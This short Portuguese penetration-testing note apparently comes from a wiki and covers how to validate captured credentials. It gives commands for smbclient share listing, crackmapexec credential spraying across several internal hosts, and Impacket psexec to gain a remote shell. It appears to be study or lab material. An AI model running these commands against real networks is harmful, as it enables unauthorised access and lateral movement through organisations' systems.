Validando as credenciais
Podemos agora utilizar as credenciais obtidas para tentarmos nos autenticar a alguns serviços.
$ smbclient -L \\<ip> -U <usuário> -W <domínio>
Podemos utilizar o crackmapexec para automatizar a autenticação de um usuário e senha em vários hosts.
$ cat hosts
172.16.1.253
172.16.1.243
172.16.1.245
$ crackmapexec smb <hosts> -d <domínio> -u <usuário> -p '<senha>'
Podemos também utilizar o psexec para tentar ganhar uma shell com o usuário e senha obtidos.
python3 /usr/share/doc/python3-impacket/examples/psexec.py <domínio>/<usuário>:'<senha>'@<ip>
Last updated
Was this helpful?